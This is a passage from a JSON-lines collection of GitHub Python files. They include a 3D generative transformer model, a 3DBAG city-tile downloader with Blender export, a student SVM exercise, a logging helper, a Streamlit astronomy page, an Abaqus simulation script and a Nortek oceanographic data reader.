bias=False)\n\n self.ln_latent = nn.LayerNorm(ninp)\n self.latent_head = nn.Linear(ninp, latent_vocab_size, bias=False)\n\n\n def forward(self, coordinates, latents, classes):\n features = self.class_enc(classes)[:, None] # B x 1 x C\n\n position_embeddings = self.pos_emb # 1 x S x C\n\n x_token_embeddings = self.x_tok_emb(coordinates[:, :, 0]) # B x S x C\n y_token_embeddings = self.y_tok_emb(coordinates[:, :, 1]) # B x S x C\n z_token_embeddings = self.z_tok_emb(coordinates[:, :, 2]) # B x S x C\n latent_token_embeddings = self.latent_tok_emb(latents) # B x S x C\n\n token_embeddings = torch.cat([features, latent_token_embeddings + x_token_embeddings + y_token_embeddings + z_token_embeddings], dim=1) # B x (1+S) x C\n embeddings = token_embeddings[:, :-1] + position_embeddings # B x S x C\n\n x = self.transformer.drop(embeddings)\n\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n x_logits = F.log_softmax(self.x_head(self.ln_x(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[12:16]:\n x = block(x)\n y_logits = F.log_softmax(self.y_head(self.ln_y(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[16:20]:\n x = block(x)\n z_logits = F.log_softmax(self.z_head(self.ln_z(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.coord_vocab_size, self.reso)\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings\n\n for block in self.transformer.blocks[20:]:\n x = block(x)\n latent_logits = F.log_softmax(self.latent_head(self.ln_latent(x)), dim=-1).permute(0, 2, 1).view(coordinates.shape[0], self.latent_vocab_size, self.reso)\n\n return x_logits, y_logits, z_logits, latent_logits\n\n @torch.no_grad()\n def sample(self, cond):\n cond = cond[:, None]\n\n position_embeddings = self.pos_emb\n\n coord1, coord2, coord3, latent = None, None, None, None\n for i in range(self.reso):\n if coord1 is None:\n x = self.transformer.drop(cond + position_embeddings[:, :1, :])\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n coord1_logits = self.x_head(self.ln_x(x))\n ix = sample(coord1_logits)\n coord1 = ix\n x_token_embeddings = self.x_tok_emb(coord1)\n\n x = x + x_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[12:16]:\n x = block(x) # B x S x C\n coord2_logits = self.y_head(self.ln_y(x))\n ix = sample(coord2_logits)\n coord2 = ix\n y_token_embeddings = self.y_tok_emb(coord2)\n\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[16:20]:\n x = block(x) # B x S x C\n coord3_logits = self.z_head(self.ln_z(x))\n ix = sample(coord3_logits)\n coord3 = ix\n z_token_embeddings = self.z_tok_emb(coord3)\n\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings[:, :1, :]\n for block in self.transformer.blocks[20:]:\n x = block(x) # B x S x C\n latent_logits = self.latent_head(self.ln_latent(x))\n ix = sample(latent_logits)\n latent = ix\n\n else:\n x_token_embeddings = self.x_tok_emb(coord1) # B x S x C\n y_token_embeddings = self.y_tok_emb(coord2) # B x S x C\n z_token_embeddings = self.z_tok_emb(coord3) # B x S x C\n latent_token_embeddings = self.latent_tok_emb(latent) # B x S x C\n\n token_embeddings = torch.cat([cond, latent_token_embeddings + x_token_embeddings + y_token_embeddings + z_token_embeddings], dim=1) # B x (1+S) x C\n embeddings = token_embeddings + position_embeddings[:, :token_embeddings.shape[1], :] # B x S x C\n # print(embeddings.shape)\n\n x = self.transformer.drop(embeddings)\n for block in self.transformer.blocks[:12]:\n x = block(x) # B x S x C\n coord1_logits = self.x_head(self.ln_x(x))\n ix = sample(coord1_logits)\n coord1 = torch.cat((coord1, ix), dim=1)\n x_token_embeddings = self.x_tok_emb(coord1)\n\n x = x + x_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[12:16]:\n x = block(x) # B x S x C\n coord2_logits = self.y_head(self.ln_y(x))\n ix = sample(coord2_logits)\n coord2 = torch.cat((coord2, ix), dim=1)\n y_token_embeddings = self.y_tok_emb(coord2)\n\n x = x + x_token_embeddings + y_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[16:20]:\n x = block(x) # B x S x C\n coord3_logits = self.z_head(self.ln_z(x))\n ix = sample(coord3_logits)\n coord3 = torch.cat((coord3, ix), dim=1)\n z_token_embeddings = self.z_tok_emb(coord3)\n\n x = x + x_token_embeddings + y_token_embeddings + z_token_embeddings + position_embeddings[:, :x.shape[1], :]\n for block in self.transformer.blocks[20:]:\n x = block(x) # B x S x C\n latent_logits = self.latent_head(self.ln_latent(x))\n ix = sample(latent_logits)\n latent = torch.cat((latent, ix), dim=1)\n return coord1, coord2, coord3, latent\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'pos_emb', 'xyz_emb'}\n\n\ndef sample(logits, top_k=100, top_p=0.85):\n temperature = 1.0\n logits = logits[:, -1, :] / temperature\n probs = F.softmax(logits, dim=-1)\n\n\n top_k = top_k\n topk, indices = torch.topk(probs, k=top_k, dim=-1)\n probs = torch.zeros(*probs.shape).to(probs.device).scatter_(1, indices, topk)\n\n # top-p\n top_p = top_p\n sorted_probs, sorted_indices = torch.sort(probs, descending=True)\n cumulative_probs = torch.cumsum(sorted_probs, dim=-1)\n\n sorted_indices_to_remove = cumulative_probs > top_p\n\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = False\n\n indices_to_remove = sorted_indices_to_remove.scatter(1, sorted_indices, sorted_indices_to_remove)\n probs[indices_to_remove] = 0\n\n ix = torch.multinomial(probs, num_samples=1)\n return ix\n\n@register_model\ndef class_encoder_55_512_1024_24_K1024(pretrained=False, **kwargs):\n model = ClassEncoder(\n ninp=1024,\n nhead=16,\n nlayers=24,\n nclasses=55,\n coord_vocab_size=256, \n latent_vocab_size=1024,\n reso=512,\n )\n model.default_cfg = _cfg()\n return model\n","repo_name":"1zb/3DILG","sub_path":"modeling_prob.py","file_name":"modeling_prob.py","file_ext":"py","file_size_in_byte":9136,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"32"} +{"seq_id":"31380327588","text":"import json\nimport urllib\nimport gzip\nimport argparse\nfrom pathlib import Path\nimport subprocess\nimport multiprocessing\nimport logging\nimport sys\n\nfrom cjio import cityjson\nfrom owslib.wfs import WebFeatureService\n\nCITYJSON_URL = \"https://data.3dbag.nl/cityjson/v210908_fd2cee53/3dbag_v210908_fd2cee53_{TID}.json.gz\"\n\ndef bbox_from_poi(poi, radius):\n x, y = poi\n return [ x-radius, y-radius, x+radius, y+radius ]\n\ndef get_tile_ids(bbox):\n wfs11 = WebFeatureService(url='https://data.3dbag.nl/api/BAG3D_v2/wfs', version='1.1.0')\n response = wfs11.getfeature(typename='BAG3D_v2:bag_tiles_3k', bbox=bbox, srsname='urn:x-ogc:def:crs:EPSG:28992', outputFormat='json')\n\n tiles = json.loads( response.read().decode('utf-8') )['features']\n tile_ids = [ tile['properties']['tile_id'] for tile in tiles ]\n\n return tile_ids\n\ndef download_3dbag(tile_ids, tilesdir):\n fnames = []\n for tid in tile_ids:\n url = CITYJSON_URL.format(TID=tid)\n logging.info(url)\n fname = tilesdir / (tid+'.json')\n try:\n with urllib.request.urlopen(url) as response, open(fname, 'wb') as out_file:\n data = response.read() # a `bytes` object\n out_file.write( gzip.decompress(data) )\n fnames.append(fname)\n except urllib.error.HTTPError as err:\n logging.warning(err)\n \n return fnames\n\ndef prepf(file):\n def set_base_zero(cm):\n def collect_vertex_ids(v_correct, h_base, boundaries):\n if type(boundaries[0]) == list:\n for bb in boundaries:\n collect_vertex_ids(v_correct, h_base, bb)\n else:\n for v in boundaries:\n v_correct[v] = h_base\n \n v_correct = {}\n for building in cm.get_cityobjects(type='Building').values():\n h_base = int( building.attributes['h_maaiveld'] / cm.j['transform']['scale'][2] )\n for partid in building.children:\n part = cm.j['CityObjects'][partid]\n for geom in part['geometry']:\n collect_vertex_ids(v_correct, h_base, geom['boundaries'])\n for v, hb in v_correct.items():\n cm.j['vertices'][v][2] -= hb\n\n cm = cityjson.load(file)\n cm.extract_lod('2.2')\n set_base_zero(cm)\n return cm\n\ndef prep_for_blender(files, fout='x.obj', origin_offset = (0,0)):\n pool_obj = multiprocessing.Pool()\n\n logging.info('prepping cm\\'s...')\n cms = pool_obj.map(prepf,files)\n # logging.info(answer)\n \n logging.info('merging cm\\'s...')\n cms[0].merge(cms[1:])\n cm = cms[0]\n\n logging.info('shifting origin...')\n # move to origin, notice that the transform object is gone after merging and the vertices are floats with the full coordinates\n for v in cm.j['vertices']:\n v[0] -= origin_offset[0]\n v[1] -= origin_offset[1]\n\n logging.info('writing obj...')\n with open(fout, mode='w') as fo:\n re = cm.export2obj()\n fo.write(re.getvalue())\n\nif __name__ == '__main__':\n # poi = (207515.1,474217.3)\n # radius = 1000\n # city_name = 'deventer'\n parser = argparse.ArgumentParser()\n parser.add_argument(\"poi\", help=\"point of interest in RD coordinates\", nargs=2, type=float)\n parser.add_argument(\"radius\", help=\"radius of bounding box around poi\", type=float, default=1000)\n parser.add_argument(\"pathname\", help=\"name of output dir\", type=str)\n args = parser.parse_args()\n\n # setup logger\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n logging.info('getting tile ids...')\n tids = get_tile_ids( bbox_from_poi(args.poi, args.radius) )\n \n logging.info('creating output directory...')\n path = Path(args.pathname)\n projectname = path.stem\n path.mkdir(parents=True, exist_ok=True)\n\n logging.info('downloading tiles...')\n tilesdir = path / 'cityjson'\n tilesdir.mkdir(exist_ok=True)\n fnames = download_3dbag(tids, tilesdir)\n \n logging.info('export to obj...')\n objpath = (path / projectname).with_suffix('.obj')\n blendpath = (path / projectname).with_suffix('.blend')\n blendpy = path / 'blendersetup.py'\n prep_for_blender(fnames, objpath, origin_offset=args.poi)\n\n logging.info('preppring blend file')\n with open( blendpy, 'w' ) as f:\n f.write(\"import bpy\\n\")\n f.write(\"bpy.ops.import_scene.obj(filepath='{}', filter_glob='*.obj;*.mtl', use_edges=False, use_smooth_groups=False, use_split_objects=False, use_split_groups=False, use_groups_as_vgroups=False, use_image_search=False, split_mode='OFF', axis_forward='Y', axis_up='Z')\\n\".format( objpath ))\n f.write(\"bpy.ops.wm.save_as_mainfile(filepath='{}')\\n\".format(blendpath))\n \n subprocess.run(['/home/rypeters/blender-2.93.5-linux-x64/blender', 'base.blend', '--background', '--python', blendpy])\n","repo_name":"Ylannl/3dbag-scripts","sub_path":"tiledownloader.py","file_name":"tiledownloader.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34541166356","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 12 13:18:56 2020\r\n\r\n@author: nishi\r\n\"\"\"\r\n\r\nimport pandas as pd\r\ndata=pd.read_csv('Social_Network_Ads.csv')\r\ndata.size\r\nx=data.iloc[:,1:4].values\r\ny=data.iloc[:,4].values\r\nprint(x)\r\nprint(y)\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabelencoder=LabelEncoder()\r\nx[:,0]=labelencoder.fit_transform(x[:,0])\r\nprint(x)\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.30,random_state=0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nst= StandardScaler() \r\nx_train=st.fit_transform(x_train) \r\ny_train=st.fit_transform(y_train)\r\nfrom sklearn.svm import SVC\r\nclf=SVC(kernel='linear')\r\nprint(x_train)\r\nprint(x_test)\r\nclf.fit(x_train,y_train)\r\ny_prod=clf.predict(x_test)\r\n\r\nfrom sklearn.metrics import classification_report,confusion_matrix\r\nprint(confusion_matrix(y_test,y_prod))\r\nprint(classification_report(y_test,y_prod))\r\nprint('accuracy',metrics.accuracy_score(y_test,y_prod))\r\n\r\n\r\nfrom sklearn.svm import SVR \r\nclf=SVR(kernel='linear')\r\nprint(x_train)\r\nprint(x_test)\r\nclf.fit(x_train,y_train)\r\ny_prod=clf.predict(x_test)","repo_name":"nishitabihani19/Machine-Learnings-Algorithms","sub_path":"lab5_hsv.py","file_name":"lab5_hsv.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71609705051","text":"from __future__ import absolute_import\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n## this class displays the session log history\nclass QPlainTextEditLogger(logging.Handler):\n \"\"\"session log history\n\n Args:\n logging (logging.Handler): log message handler\n \"\"\"\n\n def __init__(self, widget):\n \"\"\"the constructor\n\n Args:\n widget (QWidget): parent widget\n \"\"\"\n super().__init__()\n self.widget = widget\n # settings for the widget are in the `logHistoryDialog.ui` file\n\n def emit(self, record):\n \"\"\"emits changes\n\n Args:\n record (str): log message\n \"\"\"\n self.widget.appendPlainText(Logger.log_formatter.format(record))\n\n\n## logging api\nclass Logger(object):\n \"\"\"logging api\n\n Args:\n object (object): base object specialization\n \"\"\"\n\n level_lookup = {\n 10: \"DEBUG\",\n 20: \"INFO\",\n 30: \"WARNING\",\n 40: \"ERROR\",\n 50: \"CRITICAL\",\n }\n session_log_level = logging.INFO # global log level\n\n # log filesize\n # kb = 2^10 == 1024 bytes\n kb = 2**10\n # mb = 2^2^10 == 1048576 bytes\n mb = 2**2**10\n\n ## log filename\n log_filename = \"cli_gen_tool.log\"\n\n ## log format\n log_format = \"%(asctime)s - [%(levelname)s] - (%(filename)s).%(funcName)s(line:%(lineno)d) - %(message)s\"\n\n ## global formatter\n log_formatter = logging.Formatter(log_format)\n\n ## logging handlers\n root_log_handler = None\n stream_log_handler = None\n file_log_handler = None\n session_log_handler = None\n\n ## the constructor\n def __init__(self) -> None:\n super(Logger, self).__init__()\n\n def setup_logging(self, name):\n root_log_handler = logging.getLogger(name)\n root_log_handler.setLevel(Logger.session_log_level)\n root_log_handler.info(\"logging service initialized\")\n Logger.root_log_handler = root_log_handler\n stream_log_handler = logging.StreamHandler()\n stream_log_handler.setLevel(Logger.session_log_level)\n stream_log_handler.setFormatter(Logger.log_formatter)\n Logger.stream_log_handler = stream_log_handler\n Logger.root_log_handler.addHandler(stream_log_handler)\n \n ## returns a logging object if setup_logging() has been called; else None\n def get_root_logger(self):\n return Logger.root_log_handler\n\n ## returns a logging object if setup_logging() has been called; else None\n def get_stream_logger(self):\n return Logger.stream_log_handler\n\n ## returns a logging object if setup_logging() and setup_file_handler() have been called and completed successfully; else None\n def get_file_handler(self):\n return Logger.file_log_handler\n\n ## This is called to set up the log file handler in MainWindow.__init__()\n def setup_file_handler(self):\n \"\"\"sets up log file handler, requires Pathing.set_pathing()\"\"\"\n # logfile pathing\n if not os.path.isdir(self.logs_path):\n return -1\n # log filehandler\n file_log_handler = RotatingFileHandler(f\"{self.logs_path}{os.path.sep}{Logger.log_filename}\",\n \"a\",\n 10 * Logger.mb,\n backupCount=5,\n )\n file_log_handler.setLevel(Logger.session_log_level)\n file_log_handler.setFormatter(Logger.log_formatter)\n Logger.root_log_handler.info(\n f\"Log file path: {self.logs_path}{os.path.sep}{Logger.log_filename}\"\n )\n Logger.file_log_handler = file_log_handler\n return file_log_handler\n\n ## each module that logs gets a child logger from the root logger\n def get_child_logger(self, name):\n return Logger.root_log_handler.getChild(name)\n\n ## sets up window log history\n def set_up_window_history_logger(self, widget):\n \"\"\"sets up session log history app window\n\n Args:\n widget (QWidget): session log history container\n \"\"\"\n Logger.session_log_handler = QPlainTextEditLogger(widget)\n Logger.root_log_handler.addHandler(Logger.session_log_handler)\n\n ## sets handler log levels\n def set_log_levels(self):\n \"\"\"sets log levels\"\"\"\n self.parent_instance.root_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.file_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.stream_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.session_log_handler.setLevel(Logger.session_log_level)\n\n\n# end of file\n","repo_name":"dstroy0/InputHandler","sub_path":"tools/cli_gen_tool_src/modules/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29982194527","text":"\ndef century(year):\n word=str(year)\n l1=word[0:2]\n cen=int(l1)+1\n if year>2000:\n return str(cen)+\"st century\"\n if word[1:4]==\"000\":\n return word[0:2]+\"th century\"\n else:\n return str(cen)+\"th century\"\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"eAnhzXPeGbobqk2P2_6.py","file_name":"eAnhzXPeGbobqk2P2_6.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32413857783","text":"import streamlit as st\n#https://pypi.org/project/streamlit-image-comparison/\n#from streamlit_image_comparison import image_comparison\nfrom side_logo_func import add_logo, add_logo_t\n\n\n# set page config\nst.set_page_config(page_title=\"Literature\", layout=\"centered\")\n\nst.title(\"Literature\")\n\nimage_logo = \"https://raw.githubusercontent.com/ringgalaxies/ringgalaxies.github.io/main/images/RingLogoMini.png\"\n\nadd_logo(image_logo)\nadd_logo_t()\n\nst.subheader('Data')\n\nst.markdown('In this project, we are using HI data obtained through our observations \\\n\tand those available in the Australia Telescope Compact Array (ATCA) archive.')\n\nst.markdown('Images from DSS, WISE, 2MASS and GALEX survey are obtained through publicly available sources.')\n\nst.subheader('Python Packages')\n\nst.markdown('We are using the following Python packages: astropy, aplpy, matplotlib, cmasher and streamlit_image_comparison')\n\nst.write(\"Colormaps: Viridis & Magma are from Matplotlib. Amber, Horizon, Gem, Toxic,\\\n\t\t\t\t\tOcean, Bubblegum, Rainforest, Sepia and Eclipse are from Cmasher.\")\n\nst.subheader('Publication')\n\nst.markdown(\"\"\"[**The HI in Ring Galaxies Survey (HI-RINGS) - Effects of the bar on the HI gas in ring galaxies**](https://arxiv.org/pdf/2304.00515.pdf)\"\"\")\n","repo_name":"ringgalaxies/HIRingGalaxies","sub_path":"pages/03_Literature.py","file_name":"03_Literature.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16367806029","text":"\"\"\"Word Finder: finds random words from a dictionary.\"\"\"\nfrom random import randint as rand\n\nclass WordFinder:\n \"\"\"\n Class to return random words from a given file of words\n \"\"\"\n def __init__(self, path):\n \"\"\"Create instance with path to a file on disk that contains words, one per line, read the file at that path, make an attribute list of those words, print word list length\n \n >>> wf = WordFinder(\"words.txt\")\n 235886 words read\n \n >>> wf.random() in wf.words\n True\n\n >>> wf.random() in wf.words\n True\n\n >>> wf.random() in wf.words\n True\n\n >>> wf.random() in wf.words\n True\n\n\n \"\"\"\n self.path = path\n self.words = []\n fhand = open(self.path, 'r')\n for line in fhand.readlines():\n self.words.append(line.strip())\n fhand.close()\n self.print_word_list_length()\n\n \n def print_word_list_length(self):\n \"\"\"Print length of self.words\"\"\"\n print(f\"{len(self.words)} words read\")\n \n\n def random(self):\n \"\"\"Return a random word from the instance's list of words\"\"\"\n randint = rand(0, len(self.words))\n return self.words[randint]\n\n\n\nclass SpecialWordFinder(WordFinder):\n def __init__(self, path):\n \"\"\"Create instance with path to a file on disk that contains words, one per line, read the file at that path, make an attribute list of those words if they aren't common or blank, print word list length\n \n >>> swf = SpecialWordFinder(\"words.txt\")\n 235886 words read\n\n >>> swf.random() in swf.words\n True\n\n >>> swf.random() in swf.words\n True\n\n >>> swf.random() in swf.words\n True\n\n >>> swf.random() in swf.words\n True\n \n \"\"\"\n self.path = path\n self.words = []\n fhand = open(self.path, 'r')\n for line in fhand.readlines():\n if not line.startswith(\"#\") and not line.strip() == \"\":\n self.words.append(line.strip())\n fhand.close()\n self.print_word_list_length()\n","repo_name":"KCCPMG/python-oo-practice","sub_path":"wordfinder.py","file_name":"wordfinder.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25976219631","text":"#Made by J.T.B. Overvelde on 9 may 2011\n\n#copy model and delete old steps\nmdb.Model(name=modelName2, objectToCopy=mdb.models[modelName1])\ndel mdb.models[modelName2].steps[stepName1]\n\n#steps\nmdb.models[modelName2].StaticStep(nlgeom=ON, initialInc=maxIncr, minInc=1e-6, \n maxInc=maxIncr, maxNumInc=maxNumIncr, name=stepName2, previous='Initial',\n contactSolutions=10,contactIterations=300,applyContactIterations=True)\n\n#BC\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-1', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName1].sets['VIRTUAL1']\n , u1=UNSET, u2=0.0, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-2', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName2].sets['VIRTUAL2'] \n , u1=0.0, u2=UNSET, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-3', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName2].sets['VIRTUAL2']\n , u1=UNSET, u2=-stepSize*GridSpaceY*numHolesY, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-4', region=\n mdb.models[modelName1].rootAssembly.instances[instName1].sets['vertic3'], \n u1=0, u2=0, ur3=UNSET)\n\n#contact\nmdb.models[modelName2].ContactProperty('IntProp-1')\nmdb.models[modelName2].interactionProperties['IntProp-1'].NormalBehavior(\n\t allowSeparation=ON, constraintEnforcementMethod=DEFAULT, \n\t pressureOverclosure=HARD)\nfor i in range(0,len(CenSide)):\n\tmdb.models[modelName2].SelfContactStd(createStepName=stepName2, \n \t interactionProperty='IntProp-1', name='Int-'+str(i), smooth=0.2, surface=\n \t mdb.models[modelName2].rootAssembly.instances[instName1].surfaces['Surf-'+str(i)])\n\n#apply imperfection\nodb = openOdb(path=tDr+'/'+jobName1+'.odb')\nFrame1 = odb.steps[stepName1].frames[1]\ndisplacement=Frame1.fieldOutputs['U']\nfieldValues=displacement.values\nCoor=zeros((len(mdb.models[modelName2].parts[partName1].nodes),3),Float)\nrep=0\nfor i in mdb.models[modelName2].parts[partName1].nodes:\n\tCoor[i.label-1][0]=i.coordinates[0]+imperf*fieldValues[i.label-1].data[0]\n\tCoor[i.label-1][1]=i.coordinates[1]+imperf*fieldValues[i.label-1].data[1]\n\tCoor[i.label-1][2]=0.0\n\trep=rep+1\nmdb.models[modelName2].parts[partName1].editNode(\n nodes=mdb.models[modelName2].parts[partName1].nodes,\n coordinates=Coor)\nodb.close()\n","repo_name":"quisten/abaqusPython","sub_path":"Kernel Scripts/Python Example Script/AbaqusFiles/Pois-BcSteps2.py","file_name":"Pois-BcSteps2.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"71638522011","text":"import warnings\nimport logging\nimport numpy as np\nfrom struct import unpack\nfrom pathlib import Path\nfrom datetime import datetime\n\nfrom . import nortek_defs\nfrom .. import time\nfrom .base import _find_userdata, _create_dataset, _handle_nan, _abspath\nfrom ..tools import misc as tbx\nfrom ..rotate.vector import _calc_omat\nfrom ..rotate.base import _set_coords\nfrom ..rotate import api as rot\n\n\ndef read_nortek(filename, userdata=True, debug=False, do_checksum=False,\n nens=None, **kwargs):\n \"\"\"Read a classic Nortek (AWAC and Vector) datafile\n\n Parameters\n ----------\n filename : string\n Filename of Nortek file to read.\n userdata : True, False, or string of userdata.json filename\n (default ``True``) Whether to read the '.userdata.json'\n file.\n debug : bool (default: False)\n Logs debugger ouput if true\n do_checksum : bool (default False)\n Whether to perform the checksum of each data block.\n nens : None, int or 2-element tuple (start, stop)\n Number of pings or ensembles to read from the file. \n Default is None, read entire file\n\n Returns\n -------\n ds : xarray.Dataset\n An xarray dataset from the binary instrument data\n \"\"\"\n\n # Start debugger logging\n if debug:\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n filepath = Path(filename)\n logfile = filepath.with_suffix('.log')\n logging.basicConfig(filename=str(logfile),\n filemode='w',\n level=logging.NOTSET,\n format='%(name)s - %(levelname)s - %(message)s')\n\n userdata = _find_userdata(filename, userdata)\n\n with _NortekReader(filename, debug=debug, do_checksum=do_checksum,\n nens=nens) as rdr:\n rdr.readfile()\n rdr.dat2sci()\n dat = rdr.data\n\n # Remove trailing nan's in time and orientation data\n dat = _handle_nan(dat)\n\n # Search for missing timestamps and interpolate them\n coords = dat['coords']\n t_list = [t for t in coords if 'time' in t]\n for ky in t_list:\n tdat = coords[ky]\n tdat[tdat == 0] = np.NaN\n if np.isnan(tdat).any():\n tag = ky.lstrip('time')\n warnings.warn(\"Zero/NaN values found in '{}'. Interpolating and \"\n \"extrapolating them. To identify which values were filled later, \"\n \"look for 0 values in 'status{}'\".format(ky, tag))\n tdat = time._fill_time_gaps(\n tdat, sample_rate_hz=dat['attrs']['fs'])\n coords[ky] = time.epoch2dt64(tdat).astype('datetime64[ns]')\n\n # Apply rotation matrix and declination\n rotmat = None\n declin = None\n for nm in userdata:\n if 'rotmat' in nm:\n rotmat = userdata[nm]\n elif 'dec' in nm:\n declin = userdata[nm]\n else:\n dat['attrs'][nm] = userdata[nm]\n\n # Create xarray dataset from upper level dictionary\n ds = _create_dataset(dat)\n ds = _set_coords(ds, ref_frame=ds.coord_sys)\n\n if 'orientmat' not in ds:\n ds['orientmat'] = _calc_omat(ds['time'],\n ds['heading'],\n ds['pitch'],\n ds['roll'],\n ds.get('orientation_down', None))\n\n if rotmat is not None:\n rot.set_inst2head_rotmat(ds, rotmat, inplace=True)\n if declin is not None:\n rot.set_declination(ds, declin, inplace=True)\n\n # Close handler\n if debug:\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n handler.close()\n\n return ds\n\n\ndef _bcd2char(cBCD):\n \"\"\"Taken from the Nortek System Integrator Manual \n \"Example Program\" Chapter.\n \"\"\"\n cBCD = min(cBCD, 153)\n c = (cBCD & 15)\n c += 10 * (cBCD >> 4)\n return c\n\n\ndef _bitshift8(val):\n return val >> 8\n\n\ndef _int2binarray(val, n):\n out = np.zeros(n, dtype='bool')\n for idx, n in enumerate(range(n)):\n out[idx] = val & (2 ** n)\n return out\n\n\nclass _NortekReader():\n \"\"\"A class for reading reading nortek binary files.\n This reader currently only supports AWAC and Vector data formats.\n\n Parameters\n ----------\n fname : string\n Nortek filename to read.\n endian : {'<','>'} (optional)\n Specifies if the file is in 'little' or 'big' endian format. By\n default the reader will attempt to determine this.\n debug : {True, False*} (optional)\n Print debug/progress information?\n do_checksum : {True*, False} (optional)\n Specifies whether to perform the checksum.\n bufsize : int (default 100000)\n The size of the read buffer to use.\n nens : None (default: None, read all files), int, or 2-element tuple (start, stop).\n The number of pings to read from the file. By default, the entire file\n is read.\n \"\"\"\n\n _lastread = [None, None, None, None, None]\n fun_map = {'0x00': 'read_user_cfg',\n '0x04': 'read_head_cfg',\n '0x05': 'read_hw_cfg',\n '0x07': 'read_vec_checkdata',\n '0x10': 'read_vec_data',\n '0x11': 'read_vec_sysdata',\n '0x12': 'read_vec_hdr',\n '0x71': 'read_microstrain',\n '0x20': 'read_awac_profile',\n }\n\n def __init__(self, fname, endian=None, debug=False,\n do_checksum=True, bufsize=100000, nens=None):\n self.fname = fname\n self._bufsize = bufsize\n self.f = open(_abspath(fname), 'rb', 1000)\n self.do_checksum = do_checksum\n self.filesize # initialize the filesize.\n self.debug = debug\n self.c = 0\n self._dtypes = []\n self._n_start = 0\n try:\n len(nens)\n except TypeError:\n # not a tuple, so we assume None or int\n self._npings = nens\n else:\n if len(nens) != 2:\n raise TypeError('nens must be: None (), int, or len 2')\n warnings.warn(\"A 'start ensemble' is not yet supported \"\n \"for the Nortek reader. This function will read \"\n \"the entire file, then crop the beginning at \"\n \"nens[0].\")\n self._npings = nens[1]\n self._n_start = nens[0]\n if endian is None:\n if unpack('HH', self.read(4)) == (1445, 24):\n endian = '>'\n else:\n raise Exception(\"I/O error: could not determine the \"\n \"'endianness' of the file. Are you sure this is a Nortek \"\n \"file?\")\n self.endian = endian\n self.f.seek(0, 0)\n\n # This is the configuration data:\n self.config = {}\n err_msg = (\"I/O error: The file does not \"\n \"appear to be a Nortek data file.\")\n # Read the header:\n if self.read_id() == 5:\n self.read_hw_cfg()\n else:\n raise Exception()\n if self.read_id() == 4:\n self.read_head_cfg()\n else:\n raise Exception(err_msg)\n if self.read_id() == 0:\n self.read_user_cfg()\n else:\n raise 